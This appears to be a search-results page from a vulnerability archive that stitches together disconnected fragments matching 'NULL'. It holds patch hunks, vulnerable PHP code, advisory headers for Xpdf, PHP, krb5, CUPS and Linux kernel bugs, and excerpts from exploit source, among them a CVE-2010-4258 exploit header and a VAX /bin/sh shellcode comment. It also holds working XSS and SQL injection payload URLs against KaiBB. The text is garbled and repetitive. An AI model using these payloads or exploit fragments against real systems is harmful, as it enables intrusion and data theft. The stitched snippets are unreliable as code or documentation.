| New User, Welcome! Login |
Next Page >>
NULL
char *db=thd->strdup(packet), *alias;
HA_CREATE_INFO create_info;
statistic_increment(thd->status_var.com_stat[SQLCOM_CREATE_DB],
&LOCK_status);
// null test to handle EOM
if (!db || !(alias= thd->strdup(db)) || check_db_name(db))
{
my_error(ER_WRONG_DB_NAME, MYF(0), db ? db : "NULL");
break;
}
char *oldplace = in->data;
@@ -390,6 +409,13 @@ static svn_error_t *
/* First thing in the string is the original length. */
in->data = (char *)decode_size(&len, (unsigned char *)in->data,
(unsigned char *)in->data+in->len);
+ if (in->data == NULL)
+ return svn_error_create(SVN_ERR_SVNDIFF_INVALID_COMPRESSED_DATA, NULL,
+ _("Decompression of svndiff data failed:
no size"));
+ if (len > limit)
+ return svn_error_create(SVN_ERR_SVNDIFF_INVALID_COMPRESSED_DATA, NULL,
(GPC) input. An example of the mechanism is the following:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$fields=array(
"config"=> array(T_ZBX_INT, O_OPT, P_SYS, IN("0,1"), NULL),
// actions
"groupid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
"hostid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
"start"=> array(T_ZBX_INT, O_OPT, P_SYS, BETWEEN(0,65535)."({}%".
PAGE_SIZE."==0)", NULL),
> (GPC) input. An example of the mechanism is the following:
>
> --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
>
> $fields=array(
> "config"=> array(T_ZBX_INT, O_OPT, P_SYS, IN("0,1"), NULL),
> // actions
> "groupid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
> "hostid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
> "start"=> array(T_ZBX_INT, O_OPT, P_SYS, BETWEEN(0,65535)."({}%".
> PAGE_SIZE."==0)", NULL),
http://<target>/kaibb/?'</script><script>alert(document.cookie)</script>
http://<target>/kaibb/index.php?'</script><script>alert(document.cookie)</script>
SQL Injection
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
=========
Solution
"`contact_admin` , `contact_type_msg`, `contact_activate`,
`contact_auth_type`, " . "`contact_ldap_dn`, `contact_location`,
`contact_address1`, `contact_address2`, " . "`contact_address3`,
`contact_address4`, `contact_address5`, `contact_address6`)" .
"VALUES ( ";
$rq .= "NULL, "; isset($ret["timeperiod_tp_id"]) && $ret["timeperiod_tp_id"]
!= NULL ? $rq .= "'".$ret["timeperiod_tp_id"]."', ": $rq .= "NULL, ";
isset($ret["timeperiod_tp_id2"]) && $ret["timeperiod_tp_id2"] != NULL ? $rq
.= "'".$ret["timeperiod_tp_id2"]."', ": $rq .= "NULL, ";
isset($ret["contact_name"]) && $ret["contact_name"] != NULL ? $rq .=
"'".htmlentities($ret["contact_name"], ENT_QUOTES, "UTF-8")."', ": $rq .=
* discovered by Nelson Elhage:
*
* CVE-2010-4258
* -------------
* This is the interesting one, and the reason I wrote this exploit. If a
* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
* word will be written to a user-specified pointer when that thread exits.
* This write is done using put_user(), which ensures the provided destination
* resides in valid userspace by invoking access_ok(). However, Nelson
* discovered that when the kernel performs an address limit override via
* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
> * discovered by Nelson Elhage:
> *
> * CVE-2010-4258
> * -------------
> * This is the interesting one, and the reason I wrote this exploit. If a
> * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
> * word will be written to a user-specified pointer when that thread exits.
> * This write is done using put_user(), which ensures the provided destination
> * resides in valid userspace by invoking access_ok(). However, Nelson
> * discovered that when the kernel performs an address limit override via
> * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
> * discovered by Nelson Elhage:
> *
> * CVE-2010-4258
> * -------------
> * This is the interesting one, and the reason I wrote this exploit. If a
> * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
> * word will be written to a user-specified pointer when that thread exits.
> * This write is done using put_user(), which ensures the provided destination
> * resides in valid userspace by invoking access_ok(). However, Nelson
> * discovered that when the kernel performs an address limit override via
> * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
> * discovered by Nelson Elhage:
> *
> * CVE-2010-4258
> * -------------
> * This is the interesting one, and the reason I wrote this exploit. If a
> * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
> * word will be written to a user-specified pointer when that thread exits.
> * This write is done using put_user(), which ensures the provided destination
> * resides in valid userspace by invoking access_ok(). However, Nelson
> * discovered that when the kernel performs an address limit override via
> * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
Name: Xpdf - Integer overflow which causes heap overflow and NULL pointer derefernce
Author: Adam Zabrocki / HISPASEC (<pi3@itsec.pl> or <adam@hispasec.com>)
Date: July 06, 2009
Issue:
Xpdf allows local and remote attackers to overflow buffer on heap via integer overflow vulnerability.
Xpdf is prone to NULL pointer dereference attack.
if(tout > 0) {
timeout.tv_sec = tout;
timeout.tv_usec = 0;
}
if(socket < 0) return NULL;
if(!(buffer = (char *) calloc (0, sizeof (char)))) return NULL;
while (1) {
Versions: <= 0.1.15
Platforms: *nix
Bugs: A] first buffer-overflow in RTSP_valid_response_msg
B] second buffer-overflow in RTSP_valid_response_msg
C] crash in RTSP_remove_msg
D] NULL pointer in parse_transport_header
E] NULL pointer in parse_play_time_range
F] NULL pointer in log_user_agent
G] NULL pointer in Netembryo 0.0.4
Exploitation: remote
Date: 27 Dec 2007
}
catch(AxisFault axisfault)
{
axisfault.printStackTrace();
}
return null;
}
..
the decompiled WebServiceClient.class :
memory corruption resulting from a resource liberation bug that can be
triggered with a malformed '.ics' calendar file specially crafted by a
would-be attacker.
The other two vulnerabilities lead to abnormal termination (crash) of
the iCal application due to null-pointer dereference bugs triggered
while parsing a malformed '.ics' files. The ability to inject and
execute arbitrary code on vulnerable systems using these two
vulnerabilities was researched but not proven possible.
Exploitation of these vulnerabilities in a client-side attack scenario
memory corruption resulting from a resource liberation bug that can be
triggered with a malformed '.ics' calendar file specially crafted by a
would-be attacker.
The other two vulnerabilities lead to abnormal termination (crash) of
the iCal application due to null-pointer dereference bugs triggered
while parsing a malformed '.ics' files. The ability to inject and
execute arbitrary code on vulnerable systems using these two
vulnerabilities was researched but not proven possible.
Exploitation of these vulnerabilities in a client-side attack scenario
static void exec_passwd(void)
{
int tty, pid;
switch ((pid = forkpty(&tty, NULL, NULL, NULL))) {
case -1:
pexit("forkpty");
case 0:
execl("/usr/bin/passwd", "passwd", NULL);
Original release: 2011-10-18
Last update: 2011-10-18
Topic: KDC denial of service vulnerabilities
CVE-2011-1527: null pointer dereference in KDC LDAP back end
CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:H/RL:OF/RC:C
CVSSv2 Base Score: 7.8
@@ -1232,6 +1239,10 @@
STD_PHP_INI_ENTRY("fastcgi.impersonate", "0", PHP_INI_SYSTEM, OnUpdateBool, impersonate, php_cgi_globals_struct, php_cgi_globals)
# endif
#endif
+#ifdef HAVE_PWD_H
+ STD_PHP_INI_ENTRY("cgi.suexec_base_dir", NULL, PHP_INI_SYSTEM, OnUpdateString, suexec_base_dir, php_cgi_globals_struct, php_cgi_globals)
+ STD_PHP_INI_ENTRY("cgi.suexec_user_dir", NULL, PHP_INI_SYSTEM, OnUpdateString, suexec_user_dir, php_cgi_globals_struct, php_cgi_globals)
+#endif
PHP_INI_END()
/* {{{ php_cgi_globals_ctor
PVOID * ppfn;
pmz = (PIMAGE_DOS_HEADER)
((UINT_PTR)hmMSHTML & ~(UINT_PTR)0xFFFFU);
if (pmz->e_magic != IMAGE_DOS_SIGNATURE || pmz->e_lfanew <= 0)
return NULL;
ppe = (PIMAGE_NT_HEADERS32)
((LONG_PTR)pmz + pmz->e_lfanew);
if ( ppe->Signature != IMAGE_NT_SIGNATURE ||
ppe->FileHeader.Machine != IMAGE_FILE_MACHINE_I386 ||
unsigned int token_handle;
int ret;
/* Ask for permission like a debugger */
new_token_privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
LookupPrivilegeValueA ( NULL, SE_DEBUG_NAME,
&new_token_privileges.Privileges[0].Luid );
/* Open token */
//OpenProcessToken ( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,
(void*) &token_handle );
[ PHP 5.3.6 multiple null pointer dereference ]
Author: Maksymilian Arciemowicz
http://securityreason.com/
http://securityreason.net/
http://cxib.net/
Date:
- Dis.: 20.07.2011
- Pub.: 19.08.2011
Original link:
http://cxsecurity.com/research/103
[--- 1. Multiple NULL Pointer Dereference with zend_strndup() [CVE-2011-4153] ---]
As we can see in zend_strndup()
-zend_alloca.c---
ZEND_API char *zend_strndup(const char *s, uint length)
{
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointer Vulnerability
1. *Advisory Information*
http://www.lfs.net
Versions: <= 0.5X10
Platforms: Windows
Bugs: A] nickname buffer-overflow
B] partial track buffer-overflow
C] NULL pointer access in internet/hidden S1/S2 servers
D] memcpy() NULL pointer in internet/hidden S1/S2 servers
Exploitation: remote, versus server
A] demo/S1/S2 in-game
B] demo/S1/S2 in-game
C] S1/S2 (internet/hidden)
uint32_t typedef u32;
#ifndef USE_ALTERNATE_SHELLCODE /* VAX-11 shellcode w/ explanation */
/* execve("/bin/sh", NULL, NULL) -
Take advantage of the 4.3 BSD UNIX VM.
It always puts the process entry point (_start) at address 0x00000000.
This gives us valid memory (a zero-byte string, since the first two bytes
of procedures like _start on VAX (those called with "callg" instr.) are
the saved register-mask, and in _start's case this is zero (does not matter).
MITKRB5-SA-2010-005
MIT krb5 Security Advisory 2010-005
Original release: 2010-05-18
Topic: GSS-API library null pointer dereference
CVE-2010-1321
CVSSv2 Vector: AV:N/AC:L/Au:S/C:N/I:N/A:C/E:POC/RL:OF/RC:C
va_start(ap, format);
lc = localeconv();
dst = s;
fmt = format;
asciivalue = NULL;
currency_symbol = NULL;
pad_size = 0;
while (*fmt) {
/* pass nonformating characters AS IS */
node that is not part of the kernel node set. (CVE-2010-0415)
The ATI Rage 128 (aka r128) driver in the Linux kernel before
2.6.31-git11 does not properly verify Concurrent Command Engine (CCE)
state initialization, which allows local users to cause a denial of
service (NULL pointer dereference and system crash) or possibly gain
privileges via unspecified ioctl calls. (CVE-2009-3620)
The wake_futex_pi function in kernel/futex.c in the Linux kernel
before 2.6.33-rc7 does not properly handle certain unlock operations
for a Priority Inheritance (PI) futex, which allows local users to
node that is not part of the kernel node set. (CVE-2010-0415)
The ATI Rage 128 (aka r128) driver in the Linux kernel before
2.6.31-git11 does not properly verify Concurrent Command Engine (CCE)
state initialization, which allows local users to cause a denial of
service (NULL pointer dereference and system crash) or possibly gain
privileges via unspecified ioctl calls. (CVE-2009-3620)
The wake_futex_pi function in kernel/futex.c in the Linux kernel
before 2.6.33-rc7 does not properly handle certain unlock operations
for a Priority Inheritance (PI) futex, which allows local users to
Next Page>>
|
|
|
